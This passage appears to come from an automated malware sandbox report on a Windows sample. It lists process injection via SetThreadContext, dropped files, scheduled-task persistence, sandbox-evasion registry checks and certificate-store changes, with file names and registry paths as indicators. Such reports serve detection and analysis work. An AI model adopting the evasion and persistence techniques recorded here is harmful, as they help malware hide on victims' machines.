7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
9568 | C3F8.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
-
Suspicious use of SetThreadContext 20 IoCs
Processes:
description | pid | process | target process
PID 4700 set thread context of 640 | 4700 | Thu203cdb52ef3c6580d.exe | Thu203cdb52ef3c6580d.exe
PID 2684 set thread context of 5036 | 2684 | svchost.exe | svchost.exe
PID 420 set thread context of 2364 | 420 | Thu20a5f7ccaa78.exe | Thu20a5f7ccaa78.exe
PID 7252 set thread context of 8624 | 7252 | XBR5d0OipcZIAALv0Ds4mA_b.exe | XBR5d0OipcZIAALv0Ds4mA_b.exe
PID 8068 set thread context of 9056 | 8068 | 7XVoCk2M083myR3PeWtGmlcK.exe | 7XVoCk2M083myR3PeWtGmlcK.exe
PID 7816 set thread context of 6988 | 7816 | dX9c0VLsY6QZmDeHO24bcfz5.exe | dX9c0VLsY6QZmDeHO24bcfz5.exe
PID 7576 set thread context of 9168 | 7576 | q8G7pt2bO5fMdxqZP9uX1JCU.exe | q8G7pt2bO5fMdxqZP9uX1JCU.exe
PID 9168 set thread context of 6200 | 9168 | q8G7pt2bO5fMdxqZP9uX1JCU.exe | q8G7pt2bO5fMdxqZP9uX1JCU.exe
PID 7568 set thread context of 4428 | 7568 | mG10dmTajtqdi6FuJgXzFaN5.exe | mG10dmTajtqdi6FuJgXzFaN5.exe
PID 9656 set thread context of 10192 | 9656 | 8E7A.exe | 8E7A.exe
PID 9784 set thread context of 7688 | 9784 | 9794.exe | 9794.exe
PID 7540 set thread context of 4088 | 7540 | WMIADAP.EXE | 30m_VqBd5yyKL_Q269RMiiX0.exe
PID 9828 set thread context of 8028 | 9828 | Conhost.exe | 1515.exe
PID 9624 set thread context of 5256 | 9624 | BAC0.exe | BAC0.exe
PID 9748 set thread context of 7716 | 9748 | chrome.exe | E761.exe
PID 10288 set thread context of 4576 | 10288 | 1515.exe | 1515.exe
PID 12852 set thread context of 10840 | 12852 | build2.exe | build2.exe
PID 5128 set thread context of 11364 | 5128 | build3.exe | build3.exe
PID 7004 set thread context of 6764 | 7004 | services64.exe | explorer.exe
PID 10820 set thread context of 16396 | 10820 | aeghugg | aeghugg
-
Drops file in Program Files directory 64 IoCs
Processes:
description | ioc | process
File created | C:\Program Files (x86)\UltraMediaBurner\is-GGRPB.tmp | ultramediaburner.tmp
File created | C:\Program Files (x86)\Company\NewProduct\d.jfm | md8_8eus.exe
File created | C:\Program Files (x86)\IDownload\unins000.dat | IDownload.tmp
File created | C:\Program Files (x86)\FAROrqqmwDJuC\MSPKFlJ.xml | USNydSz.exe
File opened for modification | C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini | msiexec.exe
File opened for modification | C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url | msiexec.exe
File created | C:\Program Files\Windows Security\LVPGENIUOO\IDownload.exe.config | Chmenka.exe
File opened for modification | C:\Program Files (x86)\IDownload\MyDownloader.Spider.dll | IDownload.tmp
File opened for modification | C:\Program Files (x86)\IDownload\MyDownloader.Core.dll | IDownload.tmp
File created | C:\Program Files (x86)\IDownload\is-C0KBH.tmp | IDownload.tmp
File created | C:\Program Files (x86)\IDownload\is-FOVUT.tmp | IDownload.tmp
File created | C:\Program Files (x86)\xmhVlMznYVRU2\SCroPrS.xml | gCRvjRb.exe
File created | C:\Program Files\Windows NT\AMIYBUYWES\ultramediaburner.exe | ___YHDG34.exe
File created | C:\Program Files (x86)\Company\Dohetishesi.exe | Chmenka.exe
File opened for modification | C:\Program Files (x86)\IDownload\ICSharpCode.SharpZipLib.dll | IDownload.tmp
File created | C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\tRpflWT.dll | USNydSz.exe
File created | C:\Program Files (x86)\SZbnkDASJEUn\MGPoNjg.dll | USNydSz.exe
File created | C:\Program Files\Windows NT\AMIYBUYWES\ultramediaburner.exe.config | ___YHDG34.exe
File created | C:\Program Files (x86)\UltraMediaBurner\is-0VKQ6.tmp | ultramediaburner.tmp
File created | C:\Program Files (x86)\Company\NewProduct\d | md8_8eus.exe
File created | C:\Program Files (x86)\Company\Dohetishesi.exe.config | Chmenka.exe
File created | C:\Program Files (x86)\IDownload\is-TCKRT.tmp | IDownload.tmp
File created | C:\Program Files (x86)\IDownload\is-O40PU.tmp | IDownload.tmp
File created | C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\pNKBWUu.xml | USNydSz.exe
File created | C:\Program Files (x86)\Windows Media Player\Qynuloqulae.exe.config | ___YHDG34.exe
File opened for modification | C:\Program Files (x86)\IDownload\unins000.dat | IDownload.tmp
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | gCRvjRb.exe
File created | C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\DZjqpXj.dll | gCRvjRb.exe
File created | C:\Program Files (x86)\FAROrqqmwDJuC\rzJfHCg.xml | gCRvjRb.exe
File created | C:\Program Files (x86)\xmhVlMznYVRU2\qGspXwE.xml | USNydSz.exe
File created | C:\Program Files (x86)\FAROrqqmwDJuC\qHKKQqG.dll | USNydSz.exe
File created | C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe | msiexec.exe
File opened for modification | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | 1LmD_gnw4q8R9TJXTApySnvK.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\d.jfm | md8_8eus.exe
File created | C:\Program Files\Windows Security\LVPGENIUOO\IDownload.exe | Chmenka.exe
File created | C:\Program Files (x86)\IDownload\is-V4VBI.tmp | IDownload.tmp
File created | C:\Program Files (x86)\IDownload\is-9F8S8.tmp | IDownload.tmp
File opened for modification | C:\Program Files (x86)\IDownload\downloads.xml | IDownload.App.exe
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | gCRvjRb.exe
File created | C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe | msiexec.exe
File opened for modification | C:\Program Files (x86)\UltraMediaBurner\unins000.dat | ultramediaburner.tmp
File created | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | 1LmD_gnw4q8R9TJXTApySnvK.exe
File created | C:\Program Files (x86)\IDownload\is-J3LPS.tmp | IDownload.tmp
File created | C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\dXZipRN.xml | gCRvjRb.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | gCRvjRb.exe
File created | C:\Program Files (x86)\UltraMediaBurner\unins000.dat | ultramediaburner.tmp
File opened for modification | C:\Program Files\Google\Chrome\Application\93.0.4577.63\resources.pak | cmd.exe
File created | C:\Program Files (x86)\Company\NewProduct\tmp.edb | md8_8eus.exe
File opened for modification | C:\Program Files (x86)\IDownload\IDownload.App.exe | IDownload.tmp
File created | C:\Program Files (x86)\IDownload\is-4U2E2.tmp | IDownload.tmp
File created | C:\Program Files (x86)\IDownload\is-BET20.tmp | IDownload.tmp
File created | C:\Program Files (x86)\IDownload\is-J0I2Q.tmp | IDownload.tmp
File created | C:\Program Files (x86)\TdgVoScrU\wMaCDE.dll | USNydSz.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{F656EA3B-F8E9-4CE5-AFDA-01494F9CEEFA}.xpi | USNydSz.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\cutm3.exe | XgjnLxbzwVfuidtVtZ1khfTK.exe
File created | C:\Program Files (x86)\TdgVoScrU\XWmwawu.xml | gCRvjRb.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | XgjnLxbzwVfuidtVtZ1khfTK.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{F656EA3B-F8E9-4CE5-AFDA-01494F9CEEFA}.xpi | gCRvjRb.exe
File created | C:\Program Files (x86)\TdgVoScrU\rBozWuM.xml | USNydSz.exe
File created | C:\Program Files (x86)\SZbnkDASJEUn\bTnncMO.dll | gCRvjRb.exe
File created | C:\Program Files (x86)\Windows Media Player\Qynuloqulae.exe | ___YHDG34.exe
File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | XgjnLxbzwVfuidtVtZ1khfTK.exe
File created | C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk | msiexec.exe
File opened for modification | C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url | msiexec.exe
-
Drops file in Windows directory 64 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File opened for modification | C:\Windows\assembly | IDownload.App.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdgeCP.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | Explorer.EXE
File opened for modification | C:\Windows\Installer\MSI4B43.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI6C9A.tmp | msiexec.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdge.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdgeCP.exe
File opened for modification | C:\Windows\Installer\MSI8C2F.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI8F8C.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI6360.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI6640.tmp | msiexec.exe
File opened for modification | C:\Windows\INF\display.PNF | WerFault.exe
File opened for modification | C:\Windows\Tasks\xSbgDCImQNdWYmB.job | svchost.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File opened for modification | C:\Windows\Tasks\bEwGusBEGbIeKSSfjR.job | svchost.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File opened for modification | C:\Windows\Installer\MSIB679.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\298ac.msi | msiexec.exe
File created | C:\Windows\Tasks\bEwGusBEGbIeKSSfjR.job | reg.exe
File opened for modification | C:\Windows\Installer\MSI8FBC.tmp | msiexec.exe
File created | C:\Windows\Installer\298af.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI5F49.tmp | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI9B1A.tmp | msiexec.exe
File created | C:\Windows\INF\adp80xx.PNF | WerFault.exe
File opened for modification | C:\Windows\Installer\MSI74A9.tmp | msiexec.exe
File created | C:\Windows\Tasks\xSbgDCImQNdWYmB.job | schtasks.exe
File opened for modification | C:\Windows\Installer\MSIA60A.tmp | msiexec.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdge.exe
File created | C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe | msiexec.exe
File created | C:\Windows\INF\netrasa.PNF | WerFault.exe
File opened for modification | C:\Windows\Installer\MSI9FAF.tmp | msiexec.exe
File created | C:\Windows\assembly\Desktop.ini | IDownload.App.exe
File created | C:\Windows\Tasks\wovemSUpOFDwVyMam.job | schtasks.exe
File created | C:\Windows\Tasks\lDWDrPZYJQBuPmKYQ.job | schtasks.exe
File created | C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI892F.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI97FC.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIA2DD.tmp | msiexec.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\Installer\298ac.msi | msiexec.exe
File opened for modification | C:\Windows\assembly\Desktop.ini | IDownload.App.exe
File opened for modification | C:\Windows\Tasks\wovemSUpOFDwVyMam.job | svchost.exe
File opened for modification | C:\Windows\Tasks\wovemSUpOFDwVyMam.job | schtasks.exe
File opened for modification | C:\Windows\Installer\MSI8AA7.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI8D88.tmp | msiexec.exe
File created | C:\Windows\INF\amdsata.PNF | WerFault.exe
File opened for modification | C:\Windows\INF\disk.PNF | WerFault.exe
File opened for modification | C:\Windows\Installer\MSI9CD0.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIA84E.tmp | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI7D45.tmp | msiexec.exe
File created | C:\Windows\LiveKernelReports\PDCRevocation\PDCRevocation-20210916-2117.dmp | WerFault.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\Tasks\xSbgDCImQNdWYmB.job | schtasks.exe
File opened for modification | C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe | msiexec.exe
File created | C:\Windows\INF\amdsbs.PNF | WerFault.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdge.exe
File opened for modification | C:\Windows\Tasks\lDWDrPZYJQBuPmKYQ.job | svchost.exe
File created | C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe | msiexec.exe
File created | C:\Windows\INF\3ware.PNF | WerFault.exe
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 15 IoCs
Processes:
pid | pid_target | process | target process
1372 | 1788 | WerFault.exe | Thu2025d6674aed72ba.exe
3496 | 896 | WerFault.exe | setup.exe
1248 | 896 | WerFault.exe | setup.exe
4448 | 1788 | WerFault.exe | Thu2025d6674aed72ba.exe
508 | 896 | WerFault.exe | setup.exe
2140 | 1788 | WerFault.exe | Thu2025d6674aed72ba.exe
4520 | 1788 | WerFault.exe | Thu2025d6674aed72ba.exe
4372 | 896 | WerFault.exe | setup.exe
4692 | 896 | WerFault.exe | setup.exe
1248 | 896 | WerFault.exe | setup.exe
5092 | 896 | WerFault.exe | setup.exe
4456 | 1788 | WerFault.exe | Thu2025d6674aed72ba.exe
5228 | 4956 | WerFault.exe | 8684174.scr
5556 | 3860 | WerFault.exe | 4873306.exe
5604 | 1352 | WerFault.exe | BearVpn 3.exe
-
Checks SCSI registry key(s) 3 TTPs 39 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Thu20bc9ea26f.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service | WerFault.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID | WerFault.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004\ | WerFault.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ctghugg
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID | WerFault.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003\ | WerFault.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 | WerFault.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004 | WerFault.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Thu20bc9ea26f.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | HcY5k_KrNgbxj3FPdJLM6vgP.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ | WerFault.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003\ | WerFault.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | dX9c0VLsY6QZmDeHO24bcfz5.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ctghugg
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Thu20bc9ea26f.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | dX9c0VLsY6QZmDeHO24bcfz5.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | dX9c0VLsY6QZmDeHO24bcfz5.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 8E7A.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ctghugg
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ctghugg
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ctghugg
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | aeghugg
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004\ | WerFault.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ | WerFault.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003 | WerFault.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 8E7A.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | aeghugg
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service | WerFault.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 8E7A.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | HcY5k_KrNgbxj3FPdJLM6vgP.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | HcY5k_KrNgbxj3FPdJLM6vgP.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ctghugg
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | aeghugg
-
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 30m_VqBd5yyKL_Q269RMiiX0.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | D2B.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | build2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | forfiles.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | forfiles.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | nRYNXU8kXWDM9ct7FinhQA1L.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 30m_VqBd5yyKL_Q269RMiiX0.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | build2.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | svchost.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | forfiles.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | nRYNXU8kXWDM9ct7FinhQA1L.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | D2B.exe
-
Creates scheduled task(s) 1 TTPs 27 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
11060 | schtasks.exe
17248 | schtasks.exe
11580 | schtasks.exe
13328 | schtasks.exe
12348 | schtasks.exe
6480 | schtasks.exe
13592 | schtasks.exe
9908 | schtasks.exe
10996 | schtasks.exe
8936 | schtasks.exe
17252 | schtasks.exe
2768 | schtasks.exe
8720 | schtasks.exe
16940 | schtasks.exe
13200 | schtasks.exe
13036 | schtasks.exe
13212 | schtasks.exe
7504 | schtasks.exe
12112 | schtasks.exe
9916 | schtasks.exe
10672 | schtasks.exe
13932 | schtasks.exe
11260 | schtasks.exe
6160 | schtasks.exe
11936 | schtasks.exe
8596 | schtasks.exe
6952 | schtasks.exe
-
Delays execution with timeout.exe 6 IoCs
Processes:
pid | process
10608 | timeout.exe
16752 | timeout.exe
17592 | timeout.exe
18944 | timeout.exe
12440 | timeout.exe
9484 | timeout.exe
-
Enumerates system info in registry 2 TTPs 7 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
-
Kills process with taskkill 11 IoCs
Processes:
pid | process
12316 | taskkill.exe
13008 | taskkill.exe
8644 | taskkill.exe
11152 | taskkill.exe
11216 | taskkill.exe
10552 | taskkill.exe
13352 | taskkill.exe
6096 | taskkill.exe
9724 | taskkill.exe
9312 | taskkill.exe
11080 | taskkill.exe
-
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | WerFault.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" | LzmwAqmV.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
